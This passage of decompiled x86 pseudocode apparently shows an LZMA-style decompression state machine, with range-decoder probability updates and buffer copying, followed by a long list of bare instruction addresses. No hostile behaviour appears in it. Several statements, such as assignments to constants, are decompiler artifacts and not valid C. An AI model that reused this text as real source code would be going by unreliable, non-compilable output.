                                                                                  						case 0x11:
                                                                                  							L68:
                                                                                  							__esi =  *(__ebp - 0x58);
                                                                                  							 *(__ebp - 0x84) = 0x12;
                                                                                  							goto L132;
                                                                                  						case 0x12:
                                                                                  							__eflags =  *(__ebp - 0x40);
                                                                                  							if( *(__ebp - 0x40) != 0) {
                                                                                  								__eax =  *(__ebp - 0x58);
                                                                                  								 *(__ebp - 0x84) = 0x13;
                                                                                  								__esi =  *(__ebp - 0x58) + 2;
                                                                                  								goto L132;
                                                                                  							}
                                                                                  							__eax =  *(__ebp - 0x4c);
                                                                                  							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                  							__ecx =  *(__ebp - 0x58);
                                                                                  							__eax =  *(__ebp - 0x4c) << 4;
                                                                                  							__eflags = __eax;
                                                                                  							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                  							goto L130;
                                                                                  						case 0x13:
                                                                                  							__eflags =  *(__ebp - 0x40);
                                                                                  							if( *(__ebp - 0x40) != 0) {
                                                                                  								_t469 = __ebp - 0x58;
                                                                                  								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                  								__eflags =  *_t469;
                                                                                  								 *(__ebp - 0x30) = 0x10;
                                                                                  								 *(__ebp - 0x40) = 8;
                                                                                  								L144:
                                                                                  								 *(__ebp - 0x7c) = 0x14;
                                                                                  								goto L145;
                                                                                  							}
                                                                                  							__eax =  *(__ebp - 0x4c);
                                                                                  							__ecx =  *(__ebp - 0x58);
                                                                                  							__eax =  *(__ebp - 0x4c) << 4;
                                                                                  							 *(__ebp - 0x30) = 8;
                                                                                  							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                  							L130:
                                                                                  							 *(__ebp - 0x58) = __eax;
                                                                                  							 *(__ebp - 0x40) = 3;
                                                                                  							goto L144;
                                                                                  						case 0x14:
                                                                                  							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                  							__eax =  *(__ebp - 0x80);
                                                                                  							goto L140;
                                                                                  						case 0x15:
                                                                                  							__eax = 0;
                                                                                  							__eflags =  *(__ebp - 0x38) - 7;
                                                                                  							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                  							__al = __al & 0x000000fd;
                                                                                  							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                  							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                  							goto L120;
                                                                                  						case 0x16:
                                                                                  							__eax =  *(__ebp - 0x30);
                                                                                  							__eflags = __eax - 4;
                                                                                  							if(__eax >= 4) {
                                                                                  								_push(3);
                                                                                  								_pop(__eax);
                                                                                  							}
                                                                                  							__ecx =  *(__ebp - 4);
                                                                                  							 *(__ebp - 0x40) = 6;
                                                                                  							__eax = __eax << 7;
                                                                                  							 *(__ebp - 0x7c) = 0x19;
                                                                                  							 *(__ebp - 0x58) = __eax;
                                                                                  							goto L145;
                                                                                  						case 0x17:
                                                                                  							L145:
                                                                                  							__eax =  *(__ebp - 0x40);
                                                                                  							 *(__ebp - 0x50) = 1;
                                                                                  							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                  							goto L149;
                                                                                  						case 0x18:
                                                                                  							L146:
                                                                                  							__eflags =  *(__ebp - 0x6c);
                                                                                  							if( *(__ebp - 0x6c) == 0) {
                                                                                  								 *(__ebp - 0x88) = 0x18;
                                                                                  								goto L170;
                                                                                  							}
                                                                                  							__ecx =  *(__ebp - 0x70);
                                                                                  							__eax =  *(__ebp - 0xc);
                                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							_t484 = __ebp - 0x70;
                                                                                  							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                  							__eflags =  *_t484;
                                                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							L148:
                                                                                  							_t487 = __ebp - 0x48;
                                                                                  							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                  							__eflags =  *_t487;
                                                                                  							L149:
                                                                                  							__eflags =  *(__ebp - 0x48);
                                                                                  							if( *(__ebp - 0x48) <= 0) {
                                                                                  								__ecx =  *(__ebp - 0x40);
                                                                                  								__ebx =  *(__ebp - 0x50);
                                                                                  								0 = 1;
                                                                                  								__eax = 1 << __cl;
                                                                                  								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                  								__eax =  *(__ebp - 0x7c);
                                                                                  								 *(__ebp - 0x44) = __ebx;
                                                                                  								goto L140;
                                                                                  							}
                                                                                  							__eax =  *(__ebp - 0x50);
                                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                  							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                  							__eax =  *(__ebp - 0x58);
                                                                                  							__esi = __edx + __eax;
                                                                                  							 *(__ebp - 0x54) = __esi;
                                                                                  							__ax =  *__esi;
                                                                                  							__edi = __ax & 0x0000ffff;
                                                                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                  							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                  							if( *(__ebp - 0xc) >= __ecx) {
                                                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                  								__cx = __ax;
                                                                                  								__cx = __ax >> 5;
                                                                                  								__eax = __eax - __ecx;
                                                                                  								__edx = __edx + 1;
                                                                                  								__eflags = __edx;
                                                                                  								 *__esi = __ax;
                                                                                  								 *(__ebp - 0x50) = __edx;
                                                                                  							} else {
                                                                                  								 *(__ebp - 0x10) = __ecx;
                                                                                  								0x800 = 0x800 - __edi;
                                                                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                  								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                  								 *__esi = __cx;
                                                                                  							}
                                                                                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  								goto L148;
                                                                                  							} else {
                                                                                  								goto L146;
                                                                                  							}
                                                                                  						case 0x19:
                                                                                  							__eflags = __ebx - 4;
                                                                                  							if(__ebx < 4) {
                                                                                  								 *(__ebp - 0x2c) = __ebx;
                                                                                  								L119:
                                                                                  								_t393 = __ebp - 0x2c;
                                                                                  								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                  								__eflags =  *_t393;
                                                                                  								L120:
                                                                                  								__eax =  *(__ebp - 0x2c);
                                                                                  								__eflags = __eax;
                                                                                  								if(__eax == 0) {
                                                                                  									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                  									goto L170;
                                                                                  								}
                                                                                  								__eflags = __eax -  *(__ebp - 0x60);
                                                                                  								if(__eax >  *(__ebp - 0x60)) {
                                                                                  									goto L171;
                                                                                  								}
                                                                                  								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                  								__eax =  *(__ebp - 0x30);
                                                                                  								_t400 = __ebp - 0x60;
                                                                                  								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                  								__eflags =  *_t400;
                                                                                  								goto L123;
                                                                                  							}
                                                                                  							__ecx = __ebx;
                                                                                  							__eax = __ebx;
                                                                                  							__ecx = __ebx >> 1;
                                                                                  							__eax = __ebx & 0x00000001;
                                                                                  							__ecx = (__ebx >> 1) - 1;
                                                                                  							__al = __al | 0x00000002;
                                                                                  							__eax = (__ebx & 0x00000001) << __cl;
                                                                                  							__eflags = __ebx - 0xe;
                                                                                  							 *(__ebp - 0x2c) = __eax;
                                                                                  							if(__ebx >= 0xe) {
                                                                                  								__ebx = 0;
                                                                                  								 *(__ebp - 0x48) = __ecx;
                                                                                  								L102:
                                                                                  								__eflags =  *(__ebp - 0x48);
                                                                                  								if( *(__ebp - 0x48) <= 0) {
                                                                                  									__eax = __eax + __ebx;
                                                                                  									 *(__ebp - 0x40) = 4;
                                                                                  									 *(__ebp - 0x2c) = __eax;
                                                                                  									__eax =  *(__ebp - 4);
                                                                                  									__eax =  *(__ebp - 4) + 0x644;
                                                                                  									__eflags = __eax;
                                                                                  									L108:
                                                                                  									__ebx = 0;
                                                                                  									 *(__ebp - 0x58) = __eax;
                                                                                  									 *(__ebp - 0x50) = 1;
                                                                                  									 *(__ebp - 0x44) = 0;
                                                                                  									 *(__ebp - 0x48) = 0;
                                                                                  									L112:
                                                                                  									__eax =  *(__ebp - 0x40);
                                                                                  									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                  									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                  										_t391 = __ebp - 0x2c;
                                                                                  										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                  										__eflags =  *_t391;
                                                                                  										goto L119;
                                                                                  									}
                                                                                  									__eax =  *(__ebp - 0x50);
                                                                                  									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                  									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                  									__eax =  *(__ebp - 0x58);
                                                                                  									__esi = __edi + __eax;
                                                                                  									 *(__ebp - 0x54) = __esi;
                                                                                  									__ax =  *__esi;
                                                                                  									__ecx = __ax & 0x0000ffff;
                                                                                  									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                  									__eflags =  *(__ebp - 0xc) - __edx;
                                                                                  									if( *(__ebp - 0xc) >= __edx) {
                                                                                  										__ecx = 0;
                                                                                  										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                  										__ecx = 1;
                                                                                  										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                  										__ebx = 1;
                                                                                  										__ecx =  *(__ebp - 0x48);
                                                                                  										__ebx = 1 << __cl;
                                                                                  										__ecx = 1 << __cl;
                                                                                  										__ebx =  *(__ebp - 0x44);
                                                                                  										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                  										__cx = __ax;
                                                                                  										__cx = __ax >> 5;
                                                                                  										__eax = __eax - __ecx;
                                                                                  										__edi = __edi + 1;
                                                                                  										__eflags = __edi;
                                                                                  										 *(__ebp - 0x44) = __ebx;
                                                                                  										 *__esi = __ax;
                                                                                  										 *(__ebp - 0x50) = __edi;
                                                                                  									} else {
                                                                                  										 *(__ebp - 0x10) = __edx;
                                                                                  										0x800 = 0x800 - __ecx;
                                                                                  										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                  										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                  										 *__esi = __dx;
                                                                                  									}
                                                                                  									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  										L111:
                                                                                  										_t368 = __ebp - 0x48;
                                                                                  										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                  										__eflags =  *_t368;
                                                                                  										goto L112;
                                                                                  									} else {
                                                                                  										goto L109;
                                                                                  									}
                                                                                  								}
                                                                                  								__ecx =  *(__ebp - 0xc);
                                                                                  								__ebx = __ebx + __ebx;
                                                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                  								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                  								 *(__ebp - 0x44) = __ebx;
                                                                                  								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                  									__ecx =  *(__ebp - 0x10);
                                                                                  									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                  									__ebx = __ebx | 0x00000001;
                                                                                  									__eflags = __ebx;
                                                                                  									 *(__ebp - 0x44) = __ebx;
                                                                                  								}
                                                                                  								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  									L101:
                                                                                  									_t338 = __ebp - 0x48;
                                                                                  									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                  									__eflags =  *_t338;
                                                                                  									goto L102;
                                                                                  								} else {
                                                                                  									goto L99;
                                                                                  								}
                                                                                  							}
                                                                                  							__edx =  *(__ebp - 4);
                                                                                  							__eax = __eax - __ebx;
                                                                                  							 *(__ebp - 0x40) = __ecx;
                                                                                  							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                  							goto L108;
                                                                                  						case 0x1a:
                                                                                  							goto L55;
                                                                                  						case 0x1b:
                                                                                  							L75:
                                                                                  							__eflags =  *(__ebp - 0x64);
                                                                                  							if( *(__ebp - 0x64) == 0) {
                                                                                  								 *(__ebp - 0x88) = 0x1b;
                                                                                  								goto L170;
                                                                                  							}
                                                                                  							__eax =  *(__ebp - 0x14);
                                                                                  							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                  							__eflags = __eax -  *(__ebp - 0x74);
                                                                                  							if(__eax >=  *(__ebp - 0x74)) {
                                                                                  								__eax = __eax +  *(__ebp - 0x74);
                                                                                  								__eflags = __eax;
                                                                                  							}
                                                                                  							__edx =  *(__ebp - 8);
                                                                                  							__cl =  *(__eax + __edx);
                                                                                  							__eax =  *(__ebp - 0x14);
                                                                                  							 *(__ebp - 0x5c) = __cl;
                                                                                  							 *(__eax + __edx) = __cl;
                                                                                  							__eax = __eax + 1;
                                                                                  							__edx = 0;
                                                                                  							_t274 = __eax %  *(__ebp - 0x74);
                                                                                  							__eax = __eax /  *(__ebp - 0x74);
                                                                                  							__edx = _t274;
                                                                                  							__eax =  *(__ebp - 0x68);
                                                                                  							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                  							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                  							_t283 = __ebp - 0x64;
                                                                                  							 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                  							__eflags =  *_t283;
                                                                                  							 *( *(__ebp - 0x68)) = __cl;
                                                                                  							goto L79;
                                                                                  						case 0x1c:
                                                                                  							while(1) {
                                                                                  								L123:
                                                                                  								__eflags =  *(__ebp - 0x64);
                                                                                  								if( *(__ebp - 0x64) == 0) {
                                                                                  									break;
                                                                                  								}
                                                                                  								__eax =  *(__ebp - 0x14);
                                                                                  								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                  								__eflags = __eax -  *(__ebp - 0x74);
                                                                                  								if(__eax >=  *(__ebp - 0x74)) {
                                                                                  									__eax = __eax +  *(__ebp - 0x74);
                                                                                  									__eflags = __eax;
                                                                                  								}
                                                                                  								__edx =  *(__ebp - 8);
                                                                                  								__cl =  *(__eax + __edx);
                                                                                  								__eax =  *(__ebp - 0x14);
                                                                                  								 *(__ebp - 0x5c) = __cl;
                                                                                  								 *(__eax + __edx) = __cl;
                                                                                  								__eax = __eax + 1;
                                                                                  								__edx = 0;
                                                                                  								_t414 = __eax %  *(__ebp - 0x74);
                                                                                  								__eax = __eax /  *(__ebp - 0x74);
                                                                                  								__edx = _t414;
                                                                                  								__eax =  *(__ebp - 0x68);
                                                                                  								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                  								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                  								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                  								__eflags =  *(__ebp - 0x30);
                                                                                  								 *( *(__ebp - 0x68)) = __cl;
                                                                                  								 *(__ebp - 0x14) = __edx;
                                                                                  								if( *(__ebp - 0x30) > 0) {
                                                                                  									continue;
                                                                                  								} else {
                                                                                  									goto L80;
                                                                                  								}
                                                                                  							}
                                                                                  							 *(__ebp - 0x88) = 0x1c;
                                                                                  							goto L170;
                                                                                  					}
                                                                                  				}
                                                                                  			}













                                                                                  0x00000000
                                                                                  0x00406d5f
                                                                                  0x00406d5f
                                                                                  0x00406d64
                                                                                  0x00406ddb
                                                                                  0x00406de2
                                                                                  0x00406dec
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x004073ce
                                                                                  0x004073ce
                                                                                  0x004073d4
                                                                                  0x004073da
                                                                                  0x004073e0
                                                                                  0x004073fa
                                                                                  0x004073fd
                                                                                  0x00407403
                                                                                  0x0040740e
                                                                                  0x00407410
                                                                                  0x004073e2
                                                                                  0x004073e2
                                                                                  0x004073f1
                                                                                  0x004073f5
                                                                                  0x004073f5
                                                                                  0x0040741a
                                                                                  0x00407441
                                                                                  0x00407441
                                                                                  0x00407447
                                                                                  0x00407447
                                                                                  0x00000000
                                                                                  0x0040741c
                                                                                  0x0040741c
                                                                                  0x00407420
                                                                                  0x004075cf
                                                                                  0x00000000
                                                                                  0x004075cf
                                                                                  0x0040742c
                                                                                  0x00407433
                                                                                  0x0040743b
                                                                                  0x0040743e
                                                                                  0x00000000
                                                                                  0x0040743e
                                                                                  0x00406d66
                                                                                  0x00406d66
                                                                                  0x00406d6a
                                                                                  0x00406d72
                                                                                  0x00406d75
                                                                                  0x00406d77
                                                                                  0x00406d7a
                                                                                  0x00406d7c
                                                                                  0x00406d81
                                                                                  0x00406d84
                                                                                  0x00406d8b
                                                                                  0x00406d92
                                                                                  0x00406d95
                                                                                  0x00406da0
                                                                                  0x00406da8
                                                                                  0x00406da8
                                                                                  0x00406da2
                                                                                  0x00406da2
                                                                                  0x00406da2
                                                                                  0x00406d97
                                                                                  0x00406d97
                                                                                  0x00406d97
                                                                                  0x00406daf
                                                                                  0x00406dcd
                                                                                  0x00406dcf
                                                                                  0x00406fa2
                                                                                  0x00406fa2
                                                                                  0x00406fa5
                                                                                  0x00406fa8
                                                                                  0x00406fab
                                                                                  0x00406fae
                                                                                  0x00406fb1
                                                                                  0x00406fb4
                                                                                  0x00406fb7
                                                                                  0x00406fba
                                                                                  0x00406fc0
                                                                                  0x00406fd8
                                                                                  0x00406fdb
                                                                                  0x00406fde
                                                                                  0x00406fe1
                                                                                  0x00406fe1
                                                                                  0x00406fe4
                                                                                  0x00406fea
                                                                                  0x00406fc2
                                                                                  0x00406fc2
                                                                                  0x00406fca
                                                                                  0x00406fcf
                                                                                  0x00406fd1
                                                                                  0x00406fd3
                                                                                  0x00406fd3
                                                                                  0x00406ff4
                                                                                  0x00406ff7
                                                                                  0x00406f9a
                                                                                  0x00406fa0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406ff9
                                                                                  0x00406f75
                                                                                  0x00406f79
                                                                                  0x00407581
                                                                                  0x00000000
                                                                                  0x00407581
                                                                                  0x00406f7f
                                                                                  0x00406f82
                                                                                  0x00406f85
                                                                                  0x00406f89
                                                                                  0x00406f8c
                                                                                  0x00406f92
                                                                                  0x00406f94
                                                                                  0x00406f94
                                                                                  0x00406f97
                                                                                  0x00000000
                                                                                  0x00406f97
                                                                                  0x00406db1
                                                                                  0x00406db1
                                                                                  0x00406db4
                                                                                  0x00406dba
                                                                                  0x00406dbc
                                                                                  0x00406dbc
                                                                                  0x00406dbf
                                                                                  0x00406dc2
                                                                                  0x00406dc4
                                                                                  0x00406dc5
                                                                                  0x00406dc8
                                                                                  0x00406e35
                                                                                  0x00406e35
                                                                                  0x00406e39
                                                                                  0x00406e3c
                                                                                  0x00406e3f
                                                                                  0x00406e42
                                                                                  0x00406e45
                                                                                  0x00406e46
                                                                                  0x00406e49
                                                                                  0x00406e4b
                                                                                  0x00406e51
                                                                                  0x00406e54
                                                                                  0x00406e57
                                                                                  0x00406e5a
                                                                                  0x00406e5d
                                                                                  0x00406e63
                                                                                  0x00406e7f
                                                                                  0x00406e82
                                                                                  0x00406e85
                                                                                  0x00406e88
                                                                                  0x00406e8f
                                                                                  0x00406e95
                                                                                  0x00406e99
                                                                                  0x00406e65
                                                                                  0x00406e65
                                                                                  0x00406e69
                                                                                  0x00406e71
                                                                                  0x00406e76
                                                                                  0x00406e78
                                                                                  0x00406e7a
                                                                                  0x00406e7a
                                                                                  0x00406ea3
                                                                                  0x00406ea6
                                                                                  0x00406e1d
                                                                                  0x00406e1d
                                                                                  0x00406e23
                                                                                  0x00406ed6
                                                                                  0x00406edc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406ede
                                                                                  0x00406ee1
                                                                                  0x00406ee4
                                                                                  0x00406ee7
                                                                                  0x00406eea
                                                                                  0x00406eed
                                                                                  0x00406ef0
                                                                                  0x00406ef3
                                                                                  0x00406ef6
                                                                                  0x00406efc
                                                                                  0x00406f14
                                                                                  0x00406f17
                                                                                  0x00406f1a
                                                                                  0x00406f1d
                                                                                  0x00406f1d
                                                                                  0x00406f20
                                                                                  0x00406f26
                                                                                  0x00406efe
                                                                                  0x00406efe
                                                                                  0x00406f06
                                                                                  0x00406f0b
                                                                                  0x00406f0d
                                                                                  0x00406f0f
                                                                                  0x00406f0f
                                                                                  0x00406f30
                                                                                  0x00406f33
                                                                                  0x00406eb1
                                                                                  0x00406eb5
                                                                                  0x00407575
                                                                                  0x00000000
                                                                                  0x00407575
                                                                                  0x00406ebb
                                                                                  0x00406ebe
                                                                                  0x00406ec1
                                                                                  0x00406ec5
                                                                                  0x00406ec8
                                                                                  0x00406ece
                                                                                  0x00406ed0
                                                                                  0x00406ed0
                                                                                  0x00406ed3
                                                                                  0x00406ed3
                                                                                  0x00406f33
                                                                                  0x00406f3a
                                                                                  0x00406f3a
                                                                                  0x00406f3a
                                                                                  0x00406f3e
                                                                                  0x00406f3e
                                                                                  0x00406f41
                                                                                  0x00406f44
                                                                                  0x00406f48
                                                                                  0x0040758d
                                                                                  0x00000000
                                                                                  0x0040758d
                                                                                  0x00406f4e
                                                                                  0x00406f51
                                                                                  0x00406f54
                                                                                  0x00406f57
                                                                                  0x00406f5a
                                                                                  0x00406f5d
                                                                                  0x00406f60
                                                                                  0x00406f62
                                                                                  0x00406f65
                                                                                  0x00406f68
                                                                                  0x00406f6b
                                                                                  0x00406f6d
                                                                                  0x00406f6d
                                                                                  0x00406f6d
                                                                                  0x0040710a
                                                                                  0x0040710a
                                                                                  0x0040710d
                                                                                  0x0040710d
                                                                                  0x00000000
                                                                                  0x0040710d
                                                                                  0x00406e2f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406eac
                                                                                  0x00406df8
                                                                                  0x00406dfc
                                                                                  0x00407569
                                                                                  0x004075e5
                                                                                  0x004075ed
                                                                                  0x004075f4
                                                                                  0x004075f6
                                                                                  0x004075fd
                                                                                  0x00407601
                                                                                  0x00407601
                                                                                  0x00406e02
                                                                                  0x00406e05
                                                                                  0x00406e08
                                                                                  0x00406e0c
                                                                                  0x00406e0f
                                                                                  0x00406e15
                                                                                  0x00406e17
                                                                                  0x00406e17
                                                                                  0x00406e1a
                                                                                  0x00000000
                                                                                  0x00406e1a
                                                                                  0x00406ea6
                                                                                  0x00406daf
                                                                                  0x00406be3
                                                                                  0x00406be3
                                                                                  0x00406bec
                                                                                  0x004075fa
                                                                                  0x004075fa
                                                                                  0x00000000
                                                                                  0x004075fa
                                                                                  0x00406bf2
                                                                                  0x00000000
                                                                                  0x00406bfd
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406c06
                                                                                  0x00406c09
                                                                                  0x00406c0c
                                                                                  0x00406c10
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406c16
                                                                                  0x00406c19
                                                                                  0x00406c1b
                                                                                  0x00406c1c
                                                                                  0x00406c1f
                                                                                  0x00406c21
                                                                                  0x00406c22
                                                                                  0x00406c24
                                                                                  0x00406c27
                                                                                  0x00406c2c
                                                                                  0x00406c31
                                                                                  0x00406c3a
                                                                                  0x00406c4d
                                                                                  0x00406c50
                                                                                  0x00406c5c
                                                                                  0x00406c84
                                                                                  0x00406c86
                                                                                  0x00406c94
                                                                                  0x00406c94
                                                                                  0x00406c98
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406c88
                                                                                  0x00406c88
                                                                                  0x00406c8b
                                                                                  0x00406c8c
                                                                                  0x00406c8c
                                                                                  0x00000000
                                                                                  0x00406c88
                                                                                  0x00406c62
                                                                                  0x00406c67
                                                                                  0x00406c67
                                                                                  0x00406c70
                                                                                  0x00406c78
                                                                                  0x00406c7b
                                                                                  0x00000000
                                                                                  0x00406c81
                                                                                  0x00406c81
                                                                                  0x00000000
                                                                                  0x00406c81
                                                                                  0x00000000
                                                                                  0x00406c9e
                                                                                  0x00406c9e
                                                                                  0x00406ca2
                                                                                  0x0040754e
                                                                                  0x00000000
                                                                                  0x0040754e
                                                                                  0x00406cab
                                                                                  0x00406cbb
                                                                                  0x00406cbe
                                                                                  0x00406cc1
                                                                                  0x00406cc1
                                                                                  0x00406cc1
                                                                                  0x00406cc4
                                                                                  0x00406cc8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406cca
                                                                                  0x00406cd0
                                                                                  0x00406cfa
                                                                                  0x00406d00
                                                                                  0x00406d07
                                                                                  0x00000000
                                                                                  0x00406d07
                                                                                  0x00406cd6
                                                                                  0x00406cd9
                                                                                  0x00406cde
                                                                                  0x00406cde
                                                                                  0x00406ce9
                                                                                  0x00406cf1
                                                                                  0x00406cf4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406d39
                                                                                  0x00406d3f
                                                                                  0x00406d42
                                                                                  0x00406d4f
                                                                                  0x00406d57
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406d0e
                                                                                  0x00406d0e
                                                                                  0x00406d12
                                                                                  0x0040755d
                                                                                  0x00000000
                                                                                  0x0040755d
                                                                                  0x00406d1e
                                                                                  0x00406d29
                                                                                  0x00406d29
                                                                                  0x00406d29
                                                                                  0x00406d2c
                                                                                  0x00406d2f
                                                                                  0x00406d32
                                                                                  0x00406d37
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406ffe
                                                                                  0x00407002
                                                                                  0x00407020
                                                                                  0x00407023
                                                                                  0x0040702a
                                                                                  0x0040702d
                                                                                  0x00407030
                                                                                  0x00407033
                                                                                  0x00407036
                                                                                  0x00407039
                                                                                  0x0040703b
                                                                                  0x00407042
                                                                                  0x00407043
                                                                                  0x00407045
                                                                                  0x00407048
                                                                                  0x0040704b
                                                                                  0x0040704e
                                                                                  0x0040704e
                                                                                  0x00407053
                                                                                  0x00000000
                                                                                  0x00407053
                                                                                  0x00407004
                                                                                  0x00407007
                                                                                  0x0040700a
                                                                                  0x00407014
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407068
                                                                                  0x0040706c
                                                                                  0x0040708f
                                                                                  0x00407092
                                                                                  0x00407095
                                                                                  0x0040709f
                                                                                  0x0040706e
                                                                                  0x0040706e
                                                                                  0x00407071
                                                                                  0x00407074
                                                                                  0x00407077
                                                                                  0x00407084
                                                                                  0x00407087
                                                                                  0x00407087
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004070ab
                                                                                  0x004070af
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004070b5
                                                                                  0x004070b9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004070bf
                                                                                  0x004070c1
                                                                                  0x004070c5
                                                                                  0x004070c5
                                                                                  0x004070c8
                                                                                  0x004070cc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040711c
                                                                                  0x00407120
                                                                                  0x00407127
                                                                                  0x0040712a
                                                                                  0x0040712d
                                                                                  0x00407137
                                                                                  0x00000000
                                                                                  0x00407137
                                                                                  0x00407122
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407143
                                                                                  0x00407147
                                                                                  0x0040714e
                                                                                  0x00407151
                                                                                  0x00407154
                                                                                  0x00407149
                                                                                  0x00407149
                                                                                  0x00407149
                                                                                  0x00407157
                                                                                  0x0040715a
                                                                                  0x0040715d
                                                                                  0x0040715d
                                                                                  0x00407160
                                                                                  0x00407163
                                                                                  0x00407166
                                                                                  0x00407166
                                                                                  0x00407169
                                                                                  0x00407170
                                                                                  0x00407175
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407203
                                                                                  0x00407203
                                                                                  0x00407207
                                                                                  0x004075a5
                                                                                  0x00000000
                                                                                  0x004075a5
                                                                                  0x0040720d
                                                                                  0x00407210
                                                                                  0x00407213
                                                                                  0x00407217
                                                                                  0x0040721a
                                                                                  0x00407220
                                                                                  0x00407222
                                                                                  0x00407222
                                                                                  0x00407222
                                                                                  0x00407225
                                                                                  0x00407228
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407286
                                                                                  0x00407286
                                                                                  0x0040728a
                                                                                  0x004075b1
                                                                                  0x00000000
                                                                                  0x004075b1
                                                                                  0x00407290
                                                                                  0x00407293
                                                                                  0x00407296
                                                                                  0x0040729a
                                                                                  0x0040729d
                                                                                  0x004072a3
                                                                                  0x004072a5
                                                                                  0x004072a5
                                                                                  0x004072a5
                                                                                  0x004072a8
                                                                                  0x00000000
                                                                                  0x00000000
